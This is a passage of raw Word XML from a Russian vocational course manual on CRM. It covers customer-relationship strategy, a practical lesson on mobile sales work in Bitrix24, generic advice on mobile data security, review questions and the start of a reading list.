        <w:t xml:space="preserve">Первый шаг состоит в том, чтобы зафиксировать различные типы взаимоотношений, которые существуют между потребителями и брендами. Некоторые компании используют этнографический подход или глубинные интервью для лучшего осмысления взаимоотношений с клиентами, исходя из того глубокого значения, которое они придают разным категориям продуктов или конкретным брендам. Интервью для анализа критических случаев помогает понять, какие правила действуют в рамках </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>соглашения о сотрудничестве</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и как потребители реагируют на нарушение этих правил. Также полезны исследования, в рамках которых клиентам предлагается проранжировать бренды, исходя из требований к взаимоотношениям, мотивов выбора, отдельных аспектов взаимоотношений, сильных качеств и т.п. Некоторые компании внедряют карты восприятия для составления перечня типов взаимоотношений для брендов и категорий продуктов. В целом, основная цель состоит в том, чтобы выделить модели взаимоотношений и соответственно сегментировать клиентов, выделив группы людей, связанных с брендом/продуктом по сходным причинам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Разработка стратегии</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Как только перечень типов взаимоотношений будет составлен, следует определить целевую группу для работы над максимизацией генерируемой ценности. На данном этапе у компании есть выбор: можно работать со всем портфелем типов взаимоотношений целиком, а можно сосредоточить ресурсы в том направлении, которое является важным по каким-либо причинам или стратегически желаемым. Так, можно заниматься взаимоотношениями с </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>лучшими друзьями</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> бренда или ориентировать деятельность на наиболее проблемные сегменты, можно разнообразить продукцию или портфель брендов, чтобы охватить и отграничить разные типы взаимоотношений. В любом случае, работа должна происходить на почве представления о реальной подоплеке взаимоотношений, а не информации о прибыльности группы клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Подбор подходящей стратегии для каждого типа взаимоотношений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для обеспечения благополучия взаимоотношений следует создать систему, соединяющую типы и соответствующие им правила сотрудничества – как строго зафиксированные и обязательные, так и желательные, но менее жизненно важные. Очевидно, что правила имеют серьезное значение с точки зрения финансов. Полезно знать, какие правила ведут к увеличению затрат, какие – к снижению прибыли, и насколько возможно найти такой вариант, который был бы выгоден обеим сторонам. Полезно осуществить обратное проектирование лучших и худших взаимоотношений, чтобы понять, что обеспечивает успех и провал, и использовать эту информацию для дальнейшего укрепления и восстановления (там, где это нужно) взаимоотношений с клиентами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Контроль за благополучием и эффективностью взаимоотношений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для того чтобы способствовать развитию нового поколения стратегий взаимоотношений, компаниям следует не только использовать традиционные методы измерения осведомленности, частоты покупок и повторных покупок, но и применять более гибкие подходы к измерению благополучия отношений. Компании могут развивать ежемесячные или ежегодные исследования, разработанные для оценки выгодности отношений, мотивов и правил сотрудничества. Такие исследования позволяют проводить мониторинг благополучия и прибыльности различных типов взаимоотношений с клиентами. Блоги потребителей и форумы с обсуждениями могут дополнить информацию об эмоциональном развитии отношений, о степени связи с брендом, взаимозависимости клиентов и бренда, а также об уровне приверженности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компании, стремящиеся к повышению общей ценности взаимоотношений с потребителями, не могут довольствоваться имеющимися в наличии аналитическими решениями. Новый подход, основанный на анализе взаимоотношений, требует существенного сдвига в образе мыслей и в практической деятельности. Менеджеры должны расширять список типов данных, содержащихся в их CRM-системах, приспосабливать CRM-решения к разным типам взаимоотношений с клиентами и заново обучать персонал, обслуживающий клиентов, умению быть чуткими к сигналам, которые работники отправляют и получают. Сохранение статус-кво больше не является жизненно важным. Компаниям необходимо перестать гнаться за незамедлительной экономической прибылью и начать работать над созданием ценности во взаимоотношениях с клиентами в длительной перспективе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007650F3" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Что понимается под понятием </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>клиент</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00964E54" w:rsidRPr="00617AC0" w:rsidRDefault="007650F3" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Каким образом компания может строить взаимоотношения с клиентом?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="_Toc507788278"/>
      <w:bookmarkStart w:id="240" w:name="_Toc507788553"/>
      <w:bookmarkStart w:id="241" w:name="_Toc22810766"/>
      <w:bookmarkStart w:id="242" w:name="_Toc26278759"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 40 Освоение техники управления мобильными продажами (с корпоративного персонального компьютера (КПК), ноутбука или удаленный доступ) в CRM-системе</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
      <w:bookmarkEnd w:id="240"/>
      <w:bookmarkEnd w:id="241"/>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Освоение техники управления мобильными продажами (с корпоративного персонального компьютера (КПК), ноутбука или удаленный доступ) в CRM- системе. Формирование навыков работы в CRM-системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, смартфон, CRM-система, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Провести удаленную работу с клиентской базой в CRM системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся изображения этапов работы с пояснениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="00D565C2" w:rsidP="00D565C2">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="0079051C" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перейти на сайт CRM системы битрикс24 - https://www.bitrix24.ru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="00D565C2" w:rsidP="00D565C2">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="0079051C" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти в CRM систему под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="00D565C2" w:rsidP="00D565C2">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="0079051C" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проведите несколько операций с клиентами в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность бизнеса сегодня - это возможность быть на связи и обладать всеми ИТ-ресурсами своего офиса в месте присутствия клиента. Работа с CRM-системой в облаках, через терминальный доступ или мобильные клиенты iOS и Android - все это позволяет сотрудникам значительно ускорить коммуникации внутри компании по оформлению и выполнению заказа клиента, реакцию на его жалобу и другие процессы обслуживания. Руководители компании, департаментов и отделов могут на своих мобильных устройствах анализировать различные параметры деятельности компании.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные потребности в мобилизации бизнеса схожи у малого и крупного бизнеса. Однако, детализация информации в крупных компаниях гораздо выше. Например, небольшой компании по обслуживанию инженерных систем достаточно дать базовую информацию по заказу своим мобильным работникам. Детали будут неструктурировано отражены в поле «примечание» мобильного приложения. Для крупного бизнеса детализация заказа и его выполнения очень важна, т.к. на объеме всех операций возможна существенная экономия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Что касается руководителей, то в малом и крупном бизнесе количество анализируемых на мобильных устройствах параметров бизнеса может различаться на порядок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зависимость потребностей в мобильности от отрасли, конечно, прослеживается, однако стоит понимать, что в любом бизнесе можно получить эффект от внедрения мобильных CRM-технологий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность бизнеса напрямую связана с уровнем сервиса компании или, как минимум, существенно на него влияет. Основной эффект мобилизации - это ускорение всех клиентских и внутренних процессов компании, включая сервис.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наиболее популярные мобильные способы доступа к CRM-системе в России: терминальный доступ, RDP и web-интерфейс с возможностью во всех трех вариантах получить полный мобильный доступ к функционалу настольной версии CRM-решения. Доступ через мобильные устройства (коммуникаторы и планшеты) ограничивает функционал, но более удобен для работы «на ходу» или при выполнении ограниченного ряда операций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мобильность приносит в бизнес новые возможности и новые угрозы безопасности критически важных данных. Требуется обратить пристальное внимание на вопросы разделения прав доступа и ограничения объема хранимых на мобильном устройстве данных. Каналы передачи данных должны шифроваться средствами, отвечающими отраслевым стандартам. Необходимо проводить работу с персоналом. Только комплексные меры позволят защитить данные от утечек и минимизиовать потери бизнеса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Какие есть способы мобильного доступа в CRM систему?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Назовите преимущества мобильной CRM?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRPr="00617AC0" w:rsidRDefault="0079051C" w:rsidP="0079051C">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Сравните мобильные CRM приложения и интернет порталы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00964E54" w:rsidRPr="00617AC0" w:rsidRDefault="00964E54" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="110"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="243" w:name="bookmark18"/>
      <w:bookmarkStart w:id="244" w:name="_Toc26278760"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перечень рекомендуемых </w:t>
      </w:r>
      <w:bookmarkEnd w:id="243"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>источников</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные источники</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Богомазова Г.Н. Модернизация программного обеспечения персональных компьютеров, серверов, периферийных устройств и оборудования: учеб. для студ. учреждений сред. проф. образования / Г.Н. Богомазова. – М.: Издательский центр </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Академия</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>, 2015. – 192 с</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Богомазова Г.Н. Установка и обслуживание программного обеспечения персональных компьютеров, серверов, периферийных устройств и оборудования: учеб. для студ. учреждений сред. проф. образования / Г.Н. Богомазова. – М.: Издательский центр </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Академия</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>, 2015. – 256 с</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eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Варфоломеев А.А. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
